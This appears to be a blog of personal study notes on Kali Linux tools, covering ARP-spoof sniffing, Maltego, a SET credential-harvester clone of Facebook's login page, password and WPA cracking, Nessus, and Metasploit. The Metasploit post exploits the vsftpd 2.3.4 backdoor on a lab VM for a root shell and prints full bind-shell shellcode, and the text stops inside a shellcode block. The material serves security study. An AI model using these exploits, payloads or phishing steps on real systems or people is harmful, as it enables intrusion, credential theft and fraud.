[*]IP Forwarding ...
[*]ARP Spoofing ...
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

Then, the victim start to browse the Internet. I’m letting the victim run wget google.com to simulate Internet surfing.

Back to the attacker, here’s that he/she recieved:

192.168.63.156 - - [30/Mar/2016:17:36:16 +0800] "GET http://google.com/ HTTP/1.0" - - "-" "Wget/1.10.2"
192.168.63.156 - - [30/Mar/2016:17:36:26 +0800] "GET http://www.google.com.tw/?gfe_rd=cr&ei=D577VtbIMZCS9QWylY-AAw HTTP/1.0" - - "-" "Wget/1.10.2"

Reference

Tuesday, March 29, 2016

Kali Tool Series - Maltego

Maltego is a reconnaissance tool built into Kali developed by Paterva, which is a powerful information gathering tool that deals with Internet infrastructures to personal information and social networks.

Palette

Palette, here, refers to the object types supported by Maltego for drawing the network graph of the target. For each object type, it means an item in real world, and obtains relavant attributes. By running tranform actions, we can expand one object to the whole network of interest.
In Maltego, we got following types in Palette:
  • Device
  • Infrastructure
    • AS
    • DNS Name
    • Domain
    • IPv4 Address
    • MX Record
    • NS Record
    • Netblock
    • URL
    • UniqueIdentifier
    • Website
  • Locations
    • Circular Area
    • GPS Coordinate
    • Location
  • Personal
    • Alias
    • Document
    • Email Address
    • Image
    • Person
    • Phone Number
    • Phrase
  • Social Network
    • Facebook
    • Twitter

Steps

Step 1 - Open Maltego
Open Maltego at Application menu → Information Gathering → Maltego (or, just type maltego in Terminal), then register an account, select transform seeds to install.
Step 2 - Pick a Start Node
You can start from a website URL, a person, or anything that mentioned above in the Palette.
Step 3 - Expand
Right click on the object, then perform “transform” action, which will expand the graph by providing more connection to other objects.

Example Output


Gather information starts from my domain, heron.me.


Gather information starts from me, "Heron Yang".

Transform Seeds

Seeds are small pieces of XML that tell the Maltego client where it should look (at which servers) for transforms. Seeds can be thought of as something like the index of a book where you can use that to see where the relevant content is located.

Reference

Friday, March 25, 2016

Kali Tool Series - The Social-Engineer Toolkit

Preface

“Social Engineering” is a sub-field of network security. It’s much more un-related to the technical things, but frauding people around in order to hack into an unauthorized system.

The content here is only for studying purpose, one SHOULD NOT deploy in real world environment, which is illegal. While you practice, make sure you test on your own machines only and don’t fraud people.

Build a Fishing Website

The basic example, we are building a fake login website for people to put username and password.
> setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1
 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.
  
set> 2

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack> 3

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
Then, it will ask the IP of your Kali machine, which can be accessed by ifconfig command. Mine is 192.168.63.155 here.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155

  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo
  
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com/

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
Now, you’re all set. By default, the files are generated at /var/www/. However, we have to put them into /var/www/html/, which is the default folder of apache.
> cd /var/www/
> mkdir html/facebook
> mv index.html html/facebook/
> mv post.php har*txt html/
Okay, then open the url (mine is http://192.168.63.155/facebook/) on any machine that can reach your Kali machine.



Finally, you will get the username and password in harvester_….txt file:
> cat /var/www/html/har*.txt
Array
(
    [lsd] => AVqaOX85
    [display] =>
    [enable_profile_selector] =>
    [isprivate] =>
    [legacy_return] => 1
    [profile_selector_ids] =>
    [skip_api_login] =>
    [signed_next] =>
    [trynum] => 1
    [timezone] => -825
    [lgndim] => eyJ3IjoxNDQwLCJoIjo5MDAsImF3IjoxNDQ… =
    [lgnrnd] => 194144_MLVw
    [lgnjs] => 1458894004
    [email] => apple
    [pass] => banana
    [login] => 1
    [default_persistent] => 0
    [qsstamp] => W1tbOSwxMiwWEtwbVV6am45Zzd3…
)

Saturday, March 19, 2016

Kali Tool Series - John the Ripper

John the Ripper is a tool for getting passwords by bruteforcing. Make sure you don’t apply any of followings more others’ accounts or services. Try your own accounts or services.

Get Password of an Unix-like Machine

Followings are only work with an unix-like machine, and the user had already gained the access of files on it. That is, we need /etc/passwd and /etc/shadow (only /etc/passwd for acient machine).

> unshadow /etc/passwd /etc/shadow > ~/passwd

Use John’s default word list to crack the password:

> john ~/passwd

Use custom wordlist:

> john --wordlist=word.list ~/passwd

where word.list is your custom list.

To show the result:

> john --show ~/passwd

Crack Wifi

Use Wordlist (WPA2)

Use wireshark or airodump-ng to get .cap file of the traffic. Then:

> aircrack-ng –w wordlist.lst -b 00:0c:29:80:9a:85 my_traffic*.cap

where -b option indicates the MAC of your targetting BSSID, and input files are those .cap files.

Try All

Another solution is to try every possible password which is guaranteed to found the password, but it might also take forever.

> john -stdout -incremental | aircrack-ng -b 00:0c:29:80:9a:85 -w - my_traffic*.cap

Session Control

To run a long password testing process, we can make it run in the background:

> john --session=all_rules_session --wordlist=all.lst &

To check the session status:

> john --status=all_rules_session
0g 0:00:00:02  2/3 0g/s 411.5p/s 411.5c/s 411.5C/s

To restore the session:

> john --restore

Password Wordlist

For longer wordlist, one can find it online. However, there are some existing wordlist on Kali for users to apply.

> ls /usr/share/wordlists/
dirb  dirbuster  dnsmap.txt  fasttrack.txt  fern-wifi  metasploit  metasploit-jtr  nmap.lst  rockyou.txt.gz  sqlmap.txt  termineter.txt  wfuzz

they are wordlist files from different applications:

> file /usr/share/wordlists/*
/usr/share/wordlists/dirb:           symbolic link to /usr/share/dirb/wordlists
/usr/share/wordlists/dirbuster:      symbolic link to /usr/share/dirbuster/wordlists
...
/usr/share/wordlists/wfuzz:          symbolic link to /usr/share/wfuzz/wordlist

Interestingly, the best wordlist is actually hidden in the rockyou.txt.gz, so:

> gzip -dc < rockyou.txt.gz > ~/wordlist.txt

then we got wordlist.txt.

Resource

Monday, March 14, 2016

Kali Tool Series - Nessus

Nessus is an open source vulnerability scanner, which scans a network for potential security risks and provide detailed reports.
Few facts about Nessus:
  • founded by Renuad Deraison in 1998
  • supports multiple systems: Windows, Linux, Mac OS X, Sun, Solaris, etc

Feature

  • host/port discovery
  • identifies vulnerabilities
  • checks whether the systems have the latest software patches
  • tries with default passwords, common passwords on system accounts
  • malware/botnet detection
(from reference 1 and reference 2)

Install and Setup

Download Nessus at its official site (registration is required, Home version is for free)
After installation, open https://localhost:8834/ on your machine to start Nessus.

Component

  • Reports: reports from all the past scans of a target or a set of targets
  • Scans: configure or run a new scan
  • Policies: configure the things you would like to run for the scans
  • Users: different users may have different permission to apply different policies
(Reference)

Policy

Open https://localhost:8834/, and click on “+New Policy” button in the Policy tab.
The information of scanner templates provided by the policy wizard can be found here.

Settings

  • Basics
    • general: name / description
    • permission: private / share
  • Discovery: host disvocery / port scanning / service discovery
  • Assessment: for “web application” only
  • Report: configure the scan reports
  • Advanced: performance settings, additional checks, and logging features

Scan

Click on “+New Scan” button, then pick scanner template, or user created policy.

General

  • name
  • description
  • folder
  • scanner
  • targets: IP or domain name (ex. 192.168.1.0/24, 192.168.2.1, example.com)
  • upload targets: a file that contains target list

Schedule

Default is disabled.
  • launch: pick its frequency - once, daily, weekly, monthly, or yearly
  • starts on: start time
  • time zone
  • summary

Email Notification

Setting up SMTP is required.

Launch

Click on the play icon or the “launch” button, the scan will start directly.

View Results

The result page

  • Configure: directs back to the scan settings
  • Audit Trail: pulls up the audit trail dialogue
  • Launch
  • Export: allows you to save the scan result in Nessus (.nessus), PDF, HTML, CSV, or Nessus DB.

Turn On/Off Nessus

Nessus runs as service in background as default.
To turn on:
sudo launchctl load -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist
To turn off:
sudo launchctl unload -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist

Saturday, March 12, 2016

Kali Tool Series - Metasploit

Preface

This is the first post of Kali Tool Series I wrote as my own studying notes.

Introduction

Metasploit is a vulnerability and exploitation framework with a collection of exploits designed for security proessionals to perform security assessments.

Few facts about Metasploit:

  • written in Ruby
  • acquired by Rapid7
  • integrates with other common penetration testing tools: Nessus, Nmap

Also, it’s worth to know that a successful service exploitation requires following elements (reference):

  • vulnerability: a flaw in a system which can be utilized as an avenue of attack
  • exploit: a program specifically designed to leverage a vulnerability
  • payload: code to be run on the system after the vulnerability has been exploited

Modules

Before started, it’s better to briefly understand the modules in it, which can be roughly grouped into followings (reference is here):

Auxiliary modules

Useful tools like for:

  • intormation gathering
  • enumeration
  • port scanning
  • connecting to SQL databases
  • etc

Exploit modules

Modules used to deliver exploit code to a target system.

Post modules

Post exploitation tools for things like extracting passwords hashes/access tokens, taking screenshots, key-logging and downloading files.

Payload modules

Malicious payloads used after an exploitation. In Metasploit, it’s better to upload a copy of “meterpreter” payload, which opens a meterpreter backdoor smoothly.

Testing Environment

Okay, since what we are doing here may create some changes (or you can say damages) on the target machine. We can’t do this on a deployed machine without permission. Therefore, I setup a Metasploitable virtual machine as my target, which contains lots of vulnerabilities by default.

Both the target (Metasploitable) and the attacker (Kali) are virtual machines under the same local network in my following tests.

Working Flow

Here’s a demo flow using Metasploit.

1. Information Gathering

Host Discovery

First, we have to locate the machine by scanning my local network (192.168.0.x).

I’m using ARP scanning:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 192.168.63.0-255
RHOSTS => 192.168.63.0-255
msf auxiliary(arp_sweep) > run

[*] 192.168.63.1 appears to be up (VMware, Inc.).
[*] 192.168.63.2 appears to be up (VMware, Inc.).
[*] 192.168.63.156 appears to be up (VMware, Inc.).
[*] 192.168.63.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, 192.168.63.156 would be our target machine since others don’t seem like a normal device.

In addition, of course, one can use Nmap to do all the work for this part instead:

nmap -v -sV 192.168.63.1/24

Port Scanning

Then, we scan the open port of our target machine (192.168.63.156):

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.63.156   yes       The target address range or CIDR identifier
   THREADS      50               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
msf auxiliary(tcp) > run

[*] 192.168.63.156:25 - TCP OPEN
[*] 192.168.63.156:23 - TCP OPEN
[*] 192.168.63.156:22 - TCP OPEN
[*] 192.168.63.156:21 - TCP OPEN
[*] 192.168.63.156:53 - TCP OPEN
[*] 192.168.63.156:80 - TCP OPEN
… (dismiss)

By knowing which ports the machine is using, we can know which services are running on it.

2. Find Vulnerability

To find vulnerability, we may need to know the version of the service, and look it out on the database to see if there’s any known vulnerability.

Find Versions

SSH:

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ssh_version) > run

[*] 192.168.63.156:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

FTP:

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ftp_version) > run

[*] 192.168.63.156:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, the target machine is running vsFTPd 2.3.4.

Check Database

Let’s focus on vsFTPd, which is more likely to be vulnerable comparing to SSH. So, go to exploit-db, search keyword “vsFTPd”, and luckily we got “VSFTPD 2.3.4 - Backdoor Command Execution”.

To sum what we’ve got so far: the target machine is running an outdated service which contains a well-known flaw.

Find the Exploit Method

Then, let’s search it on your metesploit:

msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

Nice, the module exploit/unix/ftp/vsftpd_234_backdoor is what we need now.

3. Exploit

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   Name               Disclosure Date  Rank    Description
   ----               ---------------  ----    -----------
   cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.63.156   yes       The target address
   RPORT  21               yes       The target port


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic

There’s only one payload we can apply for this exploit, cmd/unix/interact, which means that the interaction will be setup directly after exploitation.

Now, we succeed:

msf exploit(vsftpd_234_backdoor) > run

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.63.155:53640 -> 192.168.63.156:6200) at 2016-03-11 21:22:39 +0800

whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

Custom Payload

In some cases, we may need custom payloads, like what I did for Secure Programming class in 2014.

Pick a payload and its generate shellcode (using payload/windows/shell_bind_tcp as example here):

msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

Avoid the shellcode contains specific characters (take \x00 as example):

msf payload(shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xbf\x41\x3a\x72\xae\xda\xdf\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x78\x12\x03\x78\x12\x83\x81\x3e\x90\x5b\xfd" +
"\xd7\xd6\xa4\xfd\x27\xb7\x2d\x18\x16\xf7\x4a\x69\x09\xc7" +
"\x19\x3f\xa6\xac\x4c\xab\x3d\xc0\x58\xdc\xf6\x6f\xbf\xd3" +
"\x07\xc3\x83\x72\x84\x1e\xd0\x54\xb5\xd0\x25\x95\xf2\x0d" +
"\xc7\xc7\xab\x5a\x7a\xf7\xd8\x17\x47\x7c\x92\xb6\xcf\x61" +
"\x63\xb8\xfe\x34\xff\xe3\x20\xb7\x2c\x98\x68\xaf\x31\xa5" +
"\x23\x44\x81\x51\xb2\x8c\xdb\x9a\x19\xf1\xd3\x68\x63\x36" +
"\xd3\x92\x16\x4e\x27\x2e\x21\x95\x55\xf4\xa4\x0d\xfd\x7f" +
"\x1e\xe9\xff\xac\xf9\x7a\xf3\x19\x8d\x24\x10\x9f\x42\x5f" +
"\x2c\x14\x65\x8f\xa4\x6e\x42\x0b\xec\x35\xeb\x0a\x48\x9b" +
"\x14\x4c\x33\x44\xb1\x07\xde\x91\xc8\x4a\xb7\x56\xe1\x74" +
"\x47\xf1\x72\x07\x75\x5e\x29\x8f\x35\x17\xf7\x48\x39\x02" +
"\x4f\xc6\xc4\xad\xb0\xcf\x02\xf9\xe0\x67\xa2\x82\x6a\x77" +
"\x4b\x57\x06\x7f\xea\x08\x35\x82\x4c\xf9\xf9\x2c\x25\x13" +
"\xf6\x13\x55\x1c\xdc\x3c\xfe\xe1\xdf\x53\xa3\x6c\x39\x39" +
"\x4b\x39\x91\xd5\xa9\x1e\x2a\x42\xd1\x74\x02\xe4\x9a\x9e" +
"\x95\x0b\x1b\xb5\xb1\x9b\x90\xda\x05\xba\xa6\xf6\x2d\xab" +
"\x31\x8c\xbf\x9e\xa0\x91\x95\x48\x40\x03\x72\x88\x0f\x38" +
"\x2d\xdf\x58\x8e\x24\xb5\x74\xa9\x9e\xab\x84\x2f\xd8\x6f" +
"\x53\x8c\xe7\x6e\x16\xa8\xc3\x60\xee\x31\x48\xd4\xbe\x67" +
"\x06\x82\x78\xde\xe8\x7c\xd3\x8d\xa2\xe8\xa2\xfd\x74\x6e" +
"\xab\x2b\x03\x8e\x1a\x82\x52\xb1\x93\x42\x53\xca\xc9\xf2" +
"\x9c\x01\x4a\x02\xd7\x0b\xfb\x8b\xbe\xde\xb9\xd1\x40\x35" +
"\xfd\xef\xc2\xbf\x7e\x14\xda\xca\x7b\x50\x5c\x27\xf6\xc9" +
"\x09\x47\xa5\xea\x1b"

So, we get a payload withtou \x00, which is reasonably longer than the previous one.

Then, we can apply some encoders onto the shellcode like. To list all available encoders:

msf payload(shell_bind_tcp) > show encoders

Encoders
========

   Name                          Disclosure Date  Rank       Description
   ----                          ---------------  ----       -----------
   cmd/echo                                       good       Echo Command Encoder
   cmd/generic_sh                                 manual     Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                        low        Generic ${IFS} Substitution Command Encoder
   cmd/perl                                       normal     Perl Command Encoder
   cmd/powershell_base64                          excellent  Powershell Base64 Command Encoder
   cmd/printf_php_mq                              manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/eicar                                  manual     The EICAR Encoder
   … (dismiss)

Generate code with decoder:

msf payload(shell_bind_tcp) > generate -e x86/nonalpha
# windows/shell_bind_tcp - 470 bytes
# http://www.metasploit.com
# Encoder: x86/nonalpha
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6a\x8b\xd7" +
"\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\xeb" +
"\xf1\xeb\x6f\xe8\xe2\xff\xff\xff\x17\x2b\x29\x29\x09\x31" +
"\x1a\x29\x24\x29\x31\x2f\x03\x33\x2a\x22\x32\x32\x06\x06" +
"\x23\x23\x15\x30\x23\x37\x1a\x22\x21\x2a\x21\x13\x13\x04" +
"\x08\x27\x13\x2f\x04\x27\x2b\x13\x10\x11\x22\x2b\x2b\x2b" +
"\x13\x13\x11\x25\x24\x13\x14\x24\x13\x24\x13\x07\x24\x13" +
"\x06\x0d\x2e\x1a\x13\x18\x0e\x17\x24\x24\x24\x11\x22\x25" +
"\x15\x37\x37\x37\x27\x2b\x25\x25\x25\x35\x25\x2d\x25\x25" +
"\x28\x25\x13\x02\x2d\x25\x35\x13\x25\x13\x06\x34\x09\x0c" +
"\x11\x28\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x7b" +
"\x8b\x7b\x30\x8b\x7b\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7" +
"\x7b\x26\x31\xff\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf2\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x8b\x7b" +
"\x11\x7b\xe3\x7b\x01\xd1\x7b\x8b\x7b\x20\x01\xd3\x8b\x7b" +
"\x18\xe3\x3a\x7b\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf" +
"\x0d\x01\xc7\x38\xe0\x7b\xf6\x03\x7d\xf8\x3b\x7d\x24\x7b" +
"\xe4\x7b\x8b\x7b\x24\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c" +
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b" +
"\x7b\x7b\x7b\xff\xe0\x5f\x5f\x7b\x8b\x12\xeb\x8d\x5d\x7b" +
"\x33\x32\x00\x00\x7b\x7b\x7b\x32\x5f\x7b\x7b\x7b\x7b\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x7b\x7b\x7b\x29" +
"\x80\x7b\x00\xff\xd5\x7b\x08\x7b\x7b\xe2\xfd\x40\x7b\x40" +
"\x7b\x7b\xea\x0f\xdf\xe0\xff\xd5\x97\x7b\x02\x00\x11\x5c" +
"\x89\xe6\x7b\x10\x7b\x7b\x7b\xc2\xdb\x37\x7b\xff\xd5\x7b" +
"\x7b\xb7\xe9\x38\xff\xff\xd5\x7b\x7b\x7b\xec\x3b\xe1\xff" +
"\xd5\x7b\x97\x7b\x7b\x7b\x7b\x7b\xff\xd5\x7b\x7b\x7b\x7b" +
"\x00\x89\xe3\x7b\x7b\x7b\x31\xf6\x7b\x12\x7b\x7b\xe2\xfd" +
"\x7b\xc7\x7b\x24\x3c\x01\x01\x8d\x7b\x24\x10\xc6\x00\x7b" +
"\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b" +
"\xcc\x3f\x86\xff\xd5\x89\xe0\x7b\x7b\x7b\xff\x30\x7b\x08" +
"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd" +
"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b" +
"\x13\x7b\x7b\x7b\x00\x7b\xff\xd5"

or, all together:

msf payload(shell_bind_tcp) > generate -b '\x00' -e x86/alpha_mixed -f output.txt
[*] Writing 3347 bytes to output.txt...
msf payload(shell_bind_tcp) > cat output.txt
[*] exec: cat output.txt

# windows/shell_bind_tcp - 718 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x89\xe5\xd9\xe5\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x49\x6c\x79\x78\x4c\x42\x65\x50\x75\x50" +
"\x33\x30\x43\x50\x6b\x39\x5a\x45\x56\x51\x4f\x30\x75\x34" +
"\x4c\x4b\x50\x50\x64\x70\x6c\x4b\x70\x52\x66\x6c\x6c\x4b" +
"\x46\x32\x77\x64\x6e\x6b\x62\x52\x76\x48\x54\x4f\x68\x37" +
"\x70\x4a\x76\x46\x74\x71\x79\x6f\x4e\x4c\x67\x4c\x43\x51" +
"\x63\x4c\x63\x32\x34\x6c\x31\x30\x4b\x71\x58\x4f\x54\x4d" +
"\x53\x31\x48\x47\x6a\x42\x78\x72\x72\x72\x31\x47\x6e\x6b" +
"\x36\x32\x74\x50\x6c\x4b\x50\x4a\x75\x6c\x4c\x4b\x50\x4c" +
"\x42\x31\x63\x48\x68\x63\x52\x68\x76\x61\x6a\x71\x50\x51" +
"\x6e\x6b\x50\x59\x71\x30\x36\x61\x6a\x73\x6e\x6b\x73\x79" +
"\x64\x58\x6b\x53\x56\x5a\x47\x39\x6c\x4b\x35\x64\x6e\x6b" +
"\x55\x51\x39\x46\x75\x61\x4b\x4f\x4e\x4c\x6f\x31\x38\x4f" +
"\x66\x6d\x43\x31\x49\x57\x45\x68\x49\x70\x74\x35\x4c\x36" +
"\x54\x43\x73\x4d\x39\x68\x67\x4b\x33\x4d\x46\x44\x70\x75" +
"\x48\x64\x76\x38\x6c\x4b\x53\x68\x67\x54\x45\x51\x78\x53" +
"\x62\x46\x6e\x6b\x74\x4c\x72\x6b\x6e\x6b\x56\x38\x65\x4c" +
"\x36\x61\x58\x53\x4e\x6b\x46\x64\x6e\x6b\x65\x51\x4e\x30" +
"\x6c\x49\x32\x64\x75\x74\x47\x54\x51\x4b\x53\x6b\x61\x71" +
"\x63\x69\x31\x4a\x36\x31\x59\x6f\x6b\x50\x63\x6f\x53\x6f" +
"\x73\x6a\x6c\x4b\x32\x32\x6a\x4b\x6c\x4d\x71\x4d\x51\x78" +
"\x37\x43\x65\x62\x73\x30\x45\x50\x32\x48\x53\x47\x44\x33" +
"\x56\x52\x51\x4f\x70\x54\x71\x78\x50\x4c\x30\x77\x74\x66" +
"\x67\x77\x6b\x4f\x4e\x35\x4c\x78\x5a\x30\x65\x51\x37\x70" +
"\x37\x70\x51\x39\x4f\x34\x51\x44\x70\x50\x30\x68\x75\x79" +
"\x6b\x30\x72\x4b\x37\x70\x6b\x4f\x4e\x35\x63\x5a\x77\x78" +
"\x31\x49\x32\x70\x48\x62\x6b\x4d\x77\x30\x42\x70\x61\x50" +
